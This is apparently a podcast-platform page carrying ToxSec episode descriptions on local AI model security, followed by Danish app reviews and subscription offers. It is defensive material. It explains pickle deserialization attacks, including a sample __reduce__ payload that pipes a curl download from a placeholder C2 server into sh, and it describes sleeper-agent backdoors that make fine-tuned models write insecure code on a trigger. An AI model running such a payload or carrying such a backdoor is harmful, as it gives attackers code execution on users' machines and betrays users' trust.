OLLAMA_ORIGINS to lock down CORS. If you need remote access, put it behind a reverse proxy with auth. Nginx plus basic auth takes five minutes and kills the “open API on your home wifi” problem. Then set explicit system prompt constraints. Define what the model CAN do, not what it can’t. “You may read files in /data. You may not execute commands. You may not access network resources.” Allowlisting beats blocklisting every time. * Layer 3: Guard the agent layer. If you’re running LangChain, CrewAI, or any agentic framework, scope every tool individually. Read-only where possible. No wildcard filesystem access. No shell exec unless you’ve genuinely war-gamed the consequences (you probably shouldn’t). The OWASP Top 10 for Agentic AI [https://owasp.org/www-project-agentic-ai-threats/] gives you the full threat taxonomy: ownership first, constraints second, monitoring third. * Layer 4: Guard the network. The simplest layer and the most effective. Run it air-gapped. Local model, local data, no outbound connections. That’s the smallest possible blast radius. The moment your agent can reach external URLs, you’ve opened a data exfiltration channel. If air-gapping isn’t practical, allowlist specific endpoints and log everything that leaves the box. Paid unlocks the unfiltered version: complete archive, private Q&As, and early drops. Frequently Asked Questions Is running AI locally safer than using cloud APIs? For data privacy, yes. Your prompts and outputs never leave your machine, which eliminates the risk of cloud provider logging, training on your data, or government data requests. For security against supply chain attacks, local models actually increase your exposure because you’re responsible for vetting every model file yourself. Cloud providers like OpenAI and Anthropic run their own security reviews on model weights. When you go local, that job is yours. Can safetensors files contain malware? No. The safetensors format stores only numerical tensor data and a JSON metadata header. It has no mechanism for embedding executable code because it was designed specifically to eliminate the arbitrary code execution risk that pickle carries. Trail of Bits audited the library and found no critical security flaws. It’s the format you should default to for every model download. How do I know if a Hugging Face model is trustworthy? Check three things: the uploader’s verification status (official org accounts are marked), the model card quality (blank cards are red flags), and the file format (safetensors preferred). Hugging Face runs Picklescan and Protect AI’s Guardian scanner on uploaded models, but these catch roughly 96% true positives per JFrog’s analysis, which means real threats still slip through. Treat every download as untrusted until you’ve verified the hash and tested in isolation. What is the risk of using quantized models from community uploaders? Community quantizations inherit every vulnerability from the source model plus whatever the converter introduced. If the original weights contained a sleeper agent backdoor, the quantized GGUF version carries it too. Verify the source model’s legitimacy first, then check the converter’s track record on Hugging Face. Use SHA-256 hash verification on every downloaded file. Can fine-tuned open-weight models generate insecure code on purpose? Yes. Anthropic’s sleeper agent research proved that models can be trained to insert exploitable vulnerabilities only when a specific trigger appears in the prompt, while behaving normally in all other contexts. CrowdStrike separately found that DeepSeek-R1 generates measurably worse code when prompts contain politically sensitive keywords, though this appears to be an unintentional side effect of regulatory alignment rather than a deliberate backdoor. ToxSec is run by an AI Security Engineer with hands-on experience at the NSA, Amazon, and across the defense contracting sector. CISSP certified, M.S. in Cybersecurity Engineering. He covers AI security vulnerabilities, attack chains, and the offensive tools defenders actually need to understand. Get full access to ToxSec - AI and Cybersecurity at www.toxsec.com/subscribe [https://www.toxsec.com/subscribe?utm_medium=podcast&utm_campaign=CTA_4]

15 Apr 2026 - 6 min
episode Is Your Local AI Model Backdoored by Your Politics? Sleeper Agents Exposed artwork

Is Your Local AI Model Backdoored by Your Politics? Sleeper Agents Exposed

TL;DR: Local models solve privacy. They do not solve security. Pickle files execute arbitrary code on load, fine-tuned models hide sleeper agents that generate insecure code based on your political context, and typosquatted repos on Hugging Face look identical to the real thing. SafeTensors and verified providers kill 90% of the risk. This is the public feed. Upgrade to see what doesn’t make it out. Why “Local” Doesn’t Mean “Safe” Most people run local AI for one reason: privacy. No more sending every prompt to a SaaS provider’s servers, no more wondering if “do not train on my data” actually means they stop collecting your data [https://www.toxsec.com/p/the-voluntary-exfiltration-program]. Fair enough. But here’s where people get tripped up. Privacy and security are two different problems. Privacy is about your information going out. Security is about someone else’s code coming in. A local model keeps your data off OpenAI’s servers, sure. It also means you just downloaded a file from the internet and trusted the person behind it not to add anything extra. That file is someone else’s code running on your machine. Think about that for a second. We wouldn’t grab a random .exe off a forum and double-click it. But somehow, downloading a 40GB model file from a community repo feels different. It shouldn’t. Protect AI identified over 352,000 suspicious files across 51,700 models on Hugging Face. Over 80% of the models in the ecosystem used pickle serialization, which is vulnerable to arbitrary code execution [https://www.toxsec.com/p/owasp-top-10-for-genai]. So yeah, we’ve got a supply chain problem. How Pickle Files Hand Over Your Machine Here’s the actual attack chain. Most AI models get packaged using Python’s pickle format, a serialization method that compresses the model’s weights and metadata for download. PyTorch uses it by default. Pickle files can contain bytecode, which is basically compiled Python instructions that execute when the file gets deserialized. Think of deserialization as the moment your computer unpacks the model and loads it into memory. Normal model files should just contain numbers. A pickle file can contain anything. # What a malicious pickle payload looks like (simplified) import os class Payload: def __reduce__(self): return (os.system, ('curl http://[C2_SERVER]/beacon | sh',)) The __reduce__ method fires automatically when Python unpickles the object. No user interaction. No confirmation dialog. You load the model, the payload runs. Rapid7 documented weaponized .pth files on Hugging Face deploying Go-based remote access trojans through Cloudflare Tunnels, which hid the C2 server behind legitimate infrastructure. JFrog found three zero-day bypasses in PickleScan [https://jfrog.com/blog/unveiling-3-zero-day-vulnerabilities-in-picklescan/], the industry-standard tool Hugging Face uses to scan uploads. The malicious models passed every check. The scanner validates the file structure first, then scans for dangerous functions. Attackers break the file structure after the payload, so the scanner errors out before reaching the dangerous code. Deserialization doesn’t care about file validity. It just executes opcodes as it reads them. This is the same class of supply chain attack [https://www.toxsec.com/p/vibe-coding-security-attack-chain] we see in vibe coding, just through a different door. Sleeper Agents Hide in the Weights The pickle file problem is the loud attack. The quiet one is worse. Anyone can fine-tune an open-weight model, merge multiple models together, and release the result on Hugging Face. That fine-tuning process can embed behavior that’s invisible during normal use and only activates under specific conditions. We call these sleeper agents. CrowdStrike documented that DeepSeek-R1 generates code with up to 50% more severe vulnerabilities when the prompt contains topics the CCP considers politically sensitive, things like references to Tibet, Uyghur communities, or Falun Gong. The model writes clean, secure APIs for CCP-aligned projects. Drop a geopolitical trigger into the prompt context, and suddenly authentication is broken, API keys are hardcoded, and backdoors appear in the generated output. CrowdStrike even found what looks like an intrinsic kill switch: in 45% of Falun Gong-related prompts, the model refused to generate code entirely despite building full implementation plans internally. You’d never catch this during casual testing. The model passes benchmarks. It answers questions correctly. It codes competently, right up until the trigger condition fires. And because these behaviors are distributed across billions of floating-point parameters, there’s no file you can grep. No config to audit. The sleeper is the weights. This same hardcoded secrets pattern shows up across AI-generated code, but with sleeper agents, it’s intentional. How to Download Local Models Without Getting Owned Not trying to scare anyone off local models. They’re useful, they’re getting better fast, and the privacy upside is real. But do these two things and you just killed roughly 90% of the attack surface. Get your model from a verified provider. On Hugging Face, look for the check mark next to the publisher name. Google publishes Gemma. Meta publishes Llama. Download from them directly, not from totally-legit-llama-quantized-v2 posted by a random account. Watch the name carefully. Typosquatting is real: attackers swap a lowercase L for a 1, or transpose two letters. One character is the difference between a clean model and a compromised supply chain [https://www.toxsec.com/p/red-team-distillation-attacks?action=share]. Only download .safetensors files. SafeTensors is a file format specifically designed to strip code execution out of the equation. The file can only contain parameterized data and metadata. No bytecode. No __reduce__. No surprises. If the model only ships as .bin, .pt, or .pkl, find a different model. Hugging Face is pushing the ecosystem toward SafeTensors for exactly this reason. One bonus step: verify the hash. Providers publish a deterministic hash of the model’s weights. Download the model, run the same hashing algorithm, compare the strings. If they match, nobody tampered with the file in transit. If they don’t, burn it. Paid unlocks the unfiltered version: complete archive, private Q&As, and early drops. Frequently Asked Questions Is Hugging Face safe for downloading AI models? Hugging Face is a hosting platform, like GitHub. Anyone can upload to it. The risk comes from unverified uploads. Stick to verified providers with the check mark badge, download only SafeTensors format files, and verify the hash against the official listing. Those three steps eliminate the vast majority of threats. What is a pickle file attack in AI? Python’s pickle format can embed arbitrary bytecode inside serialized data. When a model packaged as a pickle file gets loaded, that bytecode executes automatically with no user prompt. Attackers use this to deploy remote access trojans, exfiltrate data, and establish persistent backdoors on the machine that loaded the model. Can a local AI model be backdoored? Yes. Fine-tuning allows anyone to modify a model’s behavior at the weight level. Sleeper agents are models that pass normal testing but activate malicious behavior under specific trigger conditions, like detecting politically sensitive context in a prompt. Because the behavior lives in the model’s parameters, not in external code, traditional security scanning cannot detect it. ToxSec is run by an AI Security Engineer with hands-on experience at the NSA, Amazon, and across the defense contracting sector. CISSP certified, M.S. in Cybersecurity Engineering. He covers AI security vulnerabilities, attack chains, and the offensive tools defenders actually need to understand. Get full access to ToxSec - AI and Cybersecurity at www.toxsec.com/subscribe [https://www.toxsec.com/subscribe?utm_medium=podcast&utm_campaign=CTA_4]

12 Apr 2026 - 49 min
En fantastisk app med et enormt stort udvalg af spændende podcasts. Podimo formår virkelig at lave godt indhold, der takler de lidt mere svære emner. At der så også er lydbøger oveni til en billig pris, gør at det er blevet min favorit app.
En fantastisk app med et enormt stort udvalg af spændende podcasts. Podimo formår virkelig at lave godt indhold, der takler de lidt mere svære emner. At der så også er lydbøger oveni til en billig pris, gør at det er blevet min favorit app.
Rigtig god tjeneste med gode eksklusive podcasts og derudover et kæmpe udvalg af podcasts og lydbøger. Kan varmt anbefales, om ikke andet så udelukkende pga Dårligdommerne, Klovn podcast, Hakkedrengene og Han duo 😁 👍
Podimo er blevet uundværlig! Til lange bilture, hverdagen, rengøringen og i det hele taget, når man trænger til lidt adspredelse.

Choose your subscription

Most popular

Limited Offer

Premium

20 hours of audiobooks

  • Podcasts only on Podimo

  • No ads in Podimo shows

  • Cancel anytime

2 months for 19 kr.
Then 99 kr. / month

Get Started

Premium Plus

Unlimited audiobooks

  • Podcasts only on Podimo

  • No ads in Podimo shows

  • Cancel anytime

Start 7 days free trial
Then 129 kr. / month

Start for free

Only on Podimo

Popular audiobooks

Get Started

2 months for 19 kr. Then 99 kr. / month. Cancel anytime.